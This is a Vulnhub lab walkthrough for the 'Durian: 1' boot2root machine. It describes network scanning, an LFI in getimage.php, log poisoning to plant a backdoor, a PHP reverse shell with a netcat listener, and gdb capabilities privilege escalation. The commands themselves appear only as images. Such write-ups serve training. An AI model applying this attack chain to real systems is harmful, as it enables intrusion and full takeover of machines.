Durian Vulnhub Walkthrough

Today, I am going to share a writeup for the boot2root challenge of the Vulnhub machine Durian: 1. It was actually an intermediate box based on a Linux. and our goal is for this machine is to read the /root flag file. you can download here the machine

Network Scanning

We begin by scanning our network finding our target IP address by using the Nmap tool. you can use any other tool like netdiscover.

Durian Vulnhub Walkthrough, Durian: 1 Vulnhub Walkthrough

The target machine is active on 192.168.43.77, Let’s run the Nmap tool aggressive scan scanning all ports and running services.

Our Nmap Scanning is complete and Nmap finds 4 open ports, 22/SSH, 7080/LiteSpeed, 8000/HTTP Nginx, and 8088/HTTP LiteSpeed service.

Enumeration

Let’s move on to the enumeration part and try to find hidden files and directory in the webserver. We will use the dirb tool.

Durian Vulnhub Walkthrough, Durian: 1 Vulnhub Walkthrough

Our dirb scanning is complete and we found some useful directory let’s open the directory one by one, We open the /cgi-data directory and here we found a getimage.php.

After check the source code getimage.php file we confirmed this URL is vulnerable to LFI ( Local File Inclusion ) let’s read the passwd file.

Durian Vulnhub Walkthrough, Durian: 1 Vulnhub Walkthrough

We open the burp suite and reload the page and capture the request and send it to the repeater request, then we try Apache log poising.

Durian Vulnhub Walkthrough, Durian: 1 Vulnhub Walkthrough

and we successfully create a backdoor shell on the target server. let’s download the PHP reverse shell target machine we use the payload output /var/www/html/blog directory,

Durian Vulnhub Walkthrough, Durian: 1 Vulnhub Walkthrough

Once our reverse shell is downloaded target machine. first, we start our netcat listener and then we execute our reverse shell. you can execute the shell by navigating the /blog directory.

and got a reverse connection target machine.

Durian Vulnhub Walkthrough, Durian: 1 Vulnhub Walkthrough

Privilege Escalation

We check the sudo permission for our current user by executing the command sudo -l, and We see that we can execute two commands as the root user and without root password. and also we check the SUID permissions.

But we can’t found any useful binnary file we again start enumeration the machine we run the getcap -r ( displays the capabilities files ) 2>/dev/null ( standard error output )

and we get two capabilities files we interested in gdb privilege escalation let’s run the privilege escalation command and escalate the privilege root user.

Finally we have root shell target machine let’s move the root directory and read the final flag.

Durian Vulnhub Walkthrough, Durian: 1 Vulnhub Walkthrough

Monitoring Vulnhub Walkthrough link